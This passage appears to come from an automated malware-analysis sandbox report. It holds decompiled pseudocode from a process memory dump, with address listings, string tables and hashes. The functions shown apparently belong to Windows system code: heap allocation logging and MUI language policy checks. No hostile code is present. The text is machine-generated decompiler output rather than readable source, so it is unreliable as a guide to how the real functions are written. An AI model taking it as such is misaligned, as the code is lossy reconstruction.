					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E00AC40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E00B830C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E00ACB150();
						} else {
							E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E00ACB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E00ADEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E00B84496(_t181, 0);
						_t177 = L00AE4620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E00B849A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E00B7FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E00AC1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E00AF16C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E00B84496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0xbb6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0xbb6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0xbb6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E00ACB150();
								} else {
									E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E00B6D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E00ACB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E00ACB150();
								} else {
									E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E00ACB150("Just allocated block at %p for %Ix bytes\n",  *0xbb6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0xbb6378 = 1;
									 *0xbb60c0 = 0;
									asm("int3");
									 *0xbb6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0xbb5708; // 0x0
					 *0xbbb1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E00B1D130(0, _t177, _t181);
				}
			}





















                                                                                                        0x00b82d82
                                                                                                        0x00b82d84
                                                                                                        0x00b82d89
                                                                                                        0x00b82d8e
                                                                                                        0x00b82d90
                                                                                                        0x00b82d92
                                                                                                        0x00b82d97
                                                                                                        0x00b82d9a
                                                                                                        0x00b82da4
                                                                                                        0x00b82dc0
                                                                                                        0x00b82dc3
                                                                                                        0x00b82dd1
                                                                                                        0x00b82dd6
                                                                                                        0x00b82dd8
                                                                                                        0x00b830a7
                                                                                                        0x00b830a7
                                                                                                        0x00b830aa
                                                                                                        0x00b830aa
                                                                                                        0x00b830ad
                                                                                                        0x00b830b4
                                                                                                        0x00000000
                                                                                                        0x00b830b9
                                                                                                        0x00b82de3
                                                                                                        0x00b82de8
                                                                                                        0x00b82deb
                                                                                                        0x00b82dee
                                                                                                        0x00b82df1
                                                                                                        0x00b82df3
                                                                                                        0x00b82dfb
                                                                                                        0x00b82dfb
                                                                                                        0x00b82df5
                                                                                                        0x00b82df5
                                                                                                        0x00b82df5
                                                                                                        0x00b82e04
                                                                                                        0x00b82e0a
                                                                                                        0x00b82e0d
                                                                                                        0x00b82e11
                                                                                                        0x00b82e11
                                                                                                        0x00b82e12
                                                                                                        0x00b82e15
                                                                                                        0x00b82e18
                                                                                                        0x00b82e1a
                                                                                                        0x00b83027
                                                                                                        0x00b83027
                                                                                                        0x00b8302d
                                                                                                        0x00b83030
                                                                                                        0x00b8304f
                                                                                                        0x00b83054
                                                                                                        0x00b83032
                                                                                                        0x00b83047
                                                                                                        0x00b8304c
                                                                                                        0x00b8305a
                                                                                                        0x00b83063
                                                                                                        0x00000000
                                                                                                        0x00b82e20
                                                                                                        0x00b82e20
                                                                                                        0x00b82e23
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b82e29
                                                                                                        0x00b82e2b
                                                                                                        0x00b82e47
                                                                                                        0x00b82e2d
                                                                                                        0x00b82e33
                                                                                                        0x00b82e38
                                                                                                        0x00b82e3f
                                                                                                        0x00b82e42
                                                                                                        0x00b82e42
                                                                                                        0x00b82e4e
                                                                                                        0x00b82e5d
                                                                                                        0x00b82e5f
                                                                                                        0x00b82e62
                                                                                                        0x00b82e66
                                                                                                        0x00b82e6b
                                                                                                        0x00b82e6d
                                                                                                        0x00000000
                                                                                                        0x00b82e73
                                                                                                        0x00b82e73
                                                                                                        0x00b82e76
                                                                                                        0x00b82e7a
                                                                                                        0x00b82e83
                                                                                                        0x00b82e83
                                                                                                        0x00b82e83
                                                                                                        0x00b82e85
                                                                                                        0x00b82e87
                                                                                                        0x00b82e8a
                                                                                                        0x00b82e8d
                                                                                                        0x00b82e92
                                                                                                        0x00b82e9c
                                                                                                        0x00b82e9f
                                                                                                        0x00b82ea1
                                                                                                        0x00b82ea2
                                                                                                        0x00b82ea6
                                                                                                        0x00b82ea6
                                                                                                        0x00b82e9f
                                                                                                        0x00b82eab
                                                                                                        0x00b82eaf
                                                                                                        0x00b82edf
                                                                                                        0x00b82ee2
                                                                                                        0x00b82ee5
                                                                                                        0x00b82eb1
                                                                                                        0x00b82eb3
                                                                                                        0x00b82eb8
                                                                                                        0x00b82ebd
                                                                                                        0x00b82ec4
                                                                                                        0x00b82ed6
                                                                                                        0x00b82ec6
                                                                                                        0x00b82ec7
                                                                                                        0x00b82ecc
                                                                                                        0x00b82ecf
                                                                                                        0x00b82ed2
                                                                                                        0x00b82ed2
                                                                                                        0x00b82ed9
                                                                                                        0x00b82ed9
                                                                                                        0x00b82ee8
                                                                                                        0x00b82eeb
                                                                                                        0x00b82eef
                                                                                                        0x00b82ef2
                                                                                                        0x00b82efe
                                                                                                        0x00b82f04
                                                                                                        0x00b82f04
                                                                                                        0x00b82f04
                                                                                                        0x00b82f06
                                                                                                        0x00b82f0d
                                                                                                        0x00b82f0f
                                                                                                        0x00b82f13
                                                                                                        0x00b82f13
                                                                                                        0x00b82f1b
                                                                                                        0x00b82f21
                                                                                                        0x00b82f27
                                                                                                        0x00b82f95
                                                                                                        0x00b82f98
                                                                                                        0x00b82f9b
                                                                                                        0x00b82fa0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b82fa6
                                                                                                        0x00b82fa9
                                                                                                        0x00b82fac
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b82fb2
                                                                                                        0x00b82fb9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b82fc3
                                                                                                        0x00b82fca
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b82fd0
                                                                                                        0x00b82fd6
                                                                                                        0x00b82fd9
                                                                                                        0x00b82ff8
                                                                                                        0x00b82ffd
                                                                                                        0x00b82fdb
                                                                                                        0x00b82ff0
                                                                                                        0x00b82ff5
                                                                                                        0x00b8300e
                                                                                                        0x00b8300f
                                                                                                        0x00b8301a
                                                                                                        0x00000000
                                                                                                        0x00b82f29
                                                                                                        0x00b82f29
                                                                                                        0x00b82f2c
                                                                                                        0x00b82f4b
                                                                                                        0x00b82f50
                                                                                                        0x00b82f2e
                                                                                                        0x00b82f43
                                                                                                        0x00b82f48
                                                                                                        0x00b82f56
                                                                                                        0x00b82f64
                                                                                                        0x00b82f6c
                                                                                                        0x00b82f6c
                                                                                                        0x00b82f72
                                                                                                        0x00b82f76
                                                                                                        0x00b82f7c
                                                                                                        0x00b82f83
                                                                                                        0x00b82f89
                                                                                                        0x00b82f8a
                                                                                                        0x00b82f8a
                                                                                                        0x00000000
                                                                                                        0x00b82f76
                                                                                                        0x00b82f27
                                                                                                        0x00b82e6d
                                                                                                        0x00b82da6
                                                                                                        0x00b82dab
                                                                                                        0x00b82db3
                                                                                                        0x00b82db9
                                                                                                        0x00b830bc
                                                                                                        0x00b830c1
                                                                                                        0x00b830c1

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                        • API String ID: 0-1745908468
                                                                                                        • Opcode ID: 37877b8ee79be9f6ad9d645b0a8280f90d450b2d21c6efac27f5a3f8676e1898
                                                                                                        • Instruction ID: 2b670a4a0e4b9a9f77ffd7b70dec7134390fbcdf6435ae3f27c612a6fd7891d2
                                                                                                        • Opcode Fuzzy Hash: 37877b8ee79be9f6ad9d645b0a8280f90d450b2d21c6efac27f5a3f8676e1898
                                                                                                        • Instruction Fuzzy Hash: 1791E1316106409FCB26EF68C495BADBBF2FF49B10F18849DE4466B2A2CB769D41CB14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AD3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 96%
                                                                                                        			E00AD3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00AD1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00AD1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00AD1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00AD1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00AD1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00AE4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00B0F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00B11370(_t276, 0xaa4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00B0BB40(0,  &_v68, _t170);
									if(L00AD43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00B0BB40(_t257,  &_v68, _t243);
								if(L00AD43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00B11370(_t278, 0xaa4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00AE4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00B0F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00B11370(_v16, 0xaa4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00B0BB40(_t262,  &_v68, _t244);
								if(L00AD43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00B11370(_t282, 0xaa4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00B0BB40(_t262,  &_v68, _t201);
							if(L00AD43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00AE4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00B0F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00B11370(_t280, 0xaa4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00B0BB40(_t267,  &_v68, _t245);
							if(L00AD43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00B11370(_t284, 0xaa4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00B0BB40(_t267,  &_v68, _t224);
						if(L00AD43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                        0x00ad3d3c
                                                                                                        0x00ad3d42
                                                                                                        0x00ad3d44
                                                                                                        0x00ad3d46
                                                                                                        0x00ad3d49
                                                                                                        0x00ad3d4c
                                                                                                        0x00ad3d4f
                                                                                                        0x00ad3d52
                                                                                                        0x00ad3d55
                                                                                                        0x00ad3d58
                                                                                                        0x00ad3d5b
                                                                                                        0x00ad3d5f
                                                                                                        0x00ad3d61
                                                                                                        0x00ad3d66
                                                                                                        0x00b28213
                                                                                                        0x00b28218
                                                                                                        0x00ad4085
                                                                                                        0x00ad4088
                                                                                                        0x00ad408e
                                                                                                        0x00ad4094
                                                                                                        0x00ad409a
                                                                                                        0x00ad40a0
                                                                                                        0x00ad40a6
                                                                                                        0x00ad40a9
                                                                                                        0x00ad40af
                                                                                                        0x00ad40b6
                                                                                                        0x00ad40bd
                                                                                                        0x00ad40bd
                                                                                                        0x00ad3d83
                                                                                                        0x00b2821f
                                                                                                        0x00b28229
                                                                                                        0x00b28238
                                                                                                        0x00b28238
                                                                                                        0x00b2823d
                                                                                                        0x00b2823d
                                                                                                        0x00ad3da0
                                                                                                        0x00ad3daf
                                                                                                        0x00ad3db5
                                                                                                        0x00ad3dba
                                                                                                        0x00ad3dba
                                                                                                        0x00ad3dd4
                                                                                                        0x00ad3e94
                                                                                                        0x00ad3eab
                                                                                                        0x00ad3f6d
                                                                                                        0x00ad3f84
                                                                                                        0x00ad406b
                                                                                                        0x00ad406b
                                                                                                        0x00ad406e
                                                                                                        0x00ad406e
                                                                                                        0x00ad4070
                                                                                                        0x00ad4074
                                                                                                        0x00b28351
                                                                                                        0x00b28351
                                                                                                        0x00ad407a
                                                                                                        0x00ad407f
                                                                                                        0x00b2835d
                                                                                                        0x00b28370
                                                                                                        0x00b28377
                                                                                                        0x00b28379
                                                                                                        0x00b2837c
                                                                                                        0x00b2837c
                                                                                                        0x00b2835d
                                                                                                        0x00000000
                                                                                                        0x00ad407f
                                                                                                        0x00ad3f8a
                                                                                                        0x00ad3f8d
                                                                                                        0x00ad3f90
                                                                                                        0x00ad3f95
                                                                                                        0x00b2830d
                                                                                                        0x00b2830f
                                                                                                        0x00ad3f9b
                                                                                                        0x00ad3fac
                                                                                                        0x00ad3fae
                                                                                                        0x00ad3fb1
                                                                                                        0x00ad3fb1
                                                                                                        0x00ad3fb6
                                                                                                        0x00b28317
                                                                                                        0x00b2831a
                                                                                                        0x00000000
                                                                                                        0x00ad3fbc
                                                                                                        0x00ad3fc1
                                                                                                        0x00ad3fc9
                                                                                                        0x00ad3fd7
                                                                                                        0x00ad3fda
                                                                                                        0x00ad3fdd
                                                                                                        0x00ad4021
                                                                                                        0x00ad4021
                                                                                                        0x00ad4029
                                                                                                        0x00ad4030
                                                                                                        0x00ad4044
                                                                                                        0x00ad4046
                                                                                                        0x00ad4046
                                                                                                        0x00ad4044
                                                                                                        0x00ad4049
                                                                                                        0x00b28327
                                                                                                        0x00b28334
                                                                                                        0x00b28339
                                                                                                        0x00b2833c
                                                                                                        0x00ad404f
                                                                                                        0x00ad404f
                                                                                                        0x00ad404f
                                                                                                        0x00ad4051
                                                                                                        0x00ad4056
                                                                                                        0x00ad4063
                                                                                                        0x00ad4063
                                                                                                        0x00ad4068
                                                                                                        0x00000000
                                                                                                        0x00ad4068
                                                                                                        0x00ad3fdf
                                                                                                        0x00ad3fe2
                                                                                                        0x00ad3fe4
                                                                                                        0x00ad3fe7
                                                                                                        0x00ad3fef
                                                                                                        0x00ad4003
                                                                                                        0x00ad4005
                                                                                                        0x00ad4005
                                                                                                        0x00ad400c
                                                                                                        0x00ad4013
                                                                                                        0x00ad4016
                                                                                                        0x00ad4017
                                                                                                        0x00ad401b
                                                                                                        0x00ad401e
                                                                                                        0x00000000
                                                                                                        0x00ad401e
                                                                                                        0x00ad3fb6
                                                                                                        0x00ad3eb1
                                                                                                        0x00ad3eb4
                                                                                                        0x00ad3eb7
                                                                                                        0x00ad3ebc
                                                                                                        0x00b282a9
                                                                                                        0x00b282ab
                                                                                                        0x00ad3ec2
                                                                                                        0x00ad3ed3
                                                                                                        0x00ad3ed5
                                                                                                        0x00ad3ed8
                                                                                                        0x00ad3ed8
                                                                                                        0x00ad3edd
                                                                                                        0x00b282b3
                                                                                                        0x00b282b6
                                                                                                        0x00000000
                                                                                                        0x00ad3ee3
                                                                                                        0x00ad3ee8
                                                                                                        0x00ad3eed
                                                                                                        0x00ad3ef0
                                                                                                        0x00ad3ef3
                                                                                                        0x00ad3f02
                                                                                                        0x00ad3f05
                                                                                                        0x00ad3f08
                                                                                                        0x00b282c0
                                                                                                        0x00b282c3
                                                                                                        0x00b282c5
                                                                                                        0x00b282c8
                                                                                                        0x00b282d0
                                                                                                        0x00b282e4
                                                                                                        0x00b282e6
                                                                                                        0x00b282e6
                                                                                                        0x00b282ed
                                                                                                        0x00b282f4
                                                                                                        0x00b282f7
                                                                                                        0x00b282f8
                                                                                                        0x00b282fc
                                                                                                        0x00b282ff
                                                                                                        0x00b282ff
                                                                                                        0x00ad3f0e
                                                                                                        0x00ad3f11
                                                                                                        0x00ad3f16
                                                                                                        0x00ad3f1d
                                                                                                        0x00ad3f31
                                                                                                        0x00b28307
                                                                                                        0x00b28307
                                                                                                        0x00ad3f31
                                                                                                        0x00ad3f39
                                                                                                        0x00ad3f48
                                                                                                        0x00ad3f4d
                                                                                                        0x00ad3f50
                                                                                                        0x00ad3f50
                                                                                                        0x00ad3f53
                                                                                                        0x00ad3f58
                                                                                                        0x00ad3f65
                                                                                                        0x00ad3f65
                                                                                                        0x00ad3f6a
                                                                                                        0x00000000
                                                                                                        0x00ad3f6a
                                                                                                        0x00ad3edd
                                                                                                        0x00ad3dda
                                                                                                        0x00ad3ddd
                                                                                                        0x00ad3de0
                                                                                                        0x00ad3de5
                                                                                                        0x00b28245
                                                                                                        0x00ad3deb
                                                                                                        0x00ad3df7
                                                                                                        0x00ad3dfc
                                                                                                        0x00ad3dfe
                                                                                                        0x00ad3e01
                                                                                                        0x00ad3e01
                                                                                                        0x00ad3e06
                                                                                                        0x00b2824d
                                                                                                        0x00b2824f
                                                                                                        0x00b28254
                                                                                                        0x00000000
                                                                                                        0x00ad3e0c
                                                                                                        0x00ad3e11
                                                                                                        0x00ad3e16
                                                                                                        0x00ad3e19
                                                                                                        0x00ad3e29
                                                                                                        0x00ad3e2c
                                                                                                        0x00ad3e2f
                                                                                                        0x00b2825c
                                                                                                        0x00b2825f
                                                                                                        0x00b28261
                                                                                                        0x00b28264
                                                                                                        0x00b2826c
                                                                                                        0x00b28280
                                                                                                        0x00b28282
                                                                                                        0x00b28282
                                                                                                        0x00b28289
                                                                                                        0x00b28290
                                                                                                        0x00b28293
                                                                                                        0x00b28294
                                                                                                        0x00b28298
                                                                                                        0x00b2829b
                                                                                                        0x00b2829b
                                                                                                        0x00ad3e35
                                                                                                        0x00ad3e38
                                                                                                        0x00ad3e3d
                                                                                                        0x00ad3e44
                                                                                                        0x00ad3e58
                                                                                                        0x00b282a3
                                                                                                        0x00b282a3
                                                                                                        0x00ad3e58
                                                                                                        0x00ad3e60
                                                                                                        0x00ad3e6f
                                                                                                        0x00ad3e74
                                                                                                        0x00ad3e77
                                                                                                        0x00ad3e77
                                                                                                        0x00ad3e7a
                                                                                                        0x00ad3e7f
                                                                                                        0x00ad3e8c
                                                                                                        0x00ad3e8c
                                                                                                        0x00ad3e91
                                                                                                        0x00000000
                                                                                                        0x00ad3e91

                                                                                                        Strings
                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 00AD3E97
                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 00AD3D8C
                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 00AD3DC0
                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 00AD3F70
                                                                                                        • WindowsExcludedProcs, xrefs: 00AD3D6F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                        • API String ID: 0-258546922
                                                                                                        • Opcode ID: 0b9042a7c70a4313707a14ad33d3135c80d330dc020876bfa6f89bc875733b49
                                                                                                        • Instruction ID: fd269679e6e992ffe61dc472e2653c1ebaee0b7fef058fed48d29e5688256f56
                                                                                                        • Opcode Fuzzy Hash: 0b9042a7c70a4313707a14ad33d3135c80d330dc020876bfa6f89bc875733b49
                                                                                                        • Instruction Fuzzy Hash: 72F13A72D01268EBCF15DF98D980AEEBBF9FF48750F14006AE506A7251DB749E01CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AF8E00, Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                                                                        Download Yara Rule
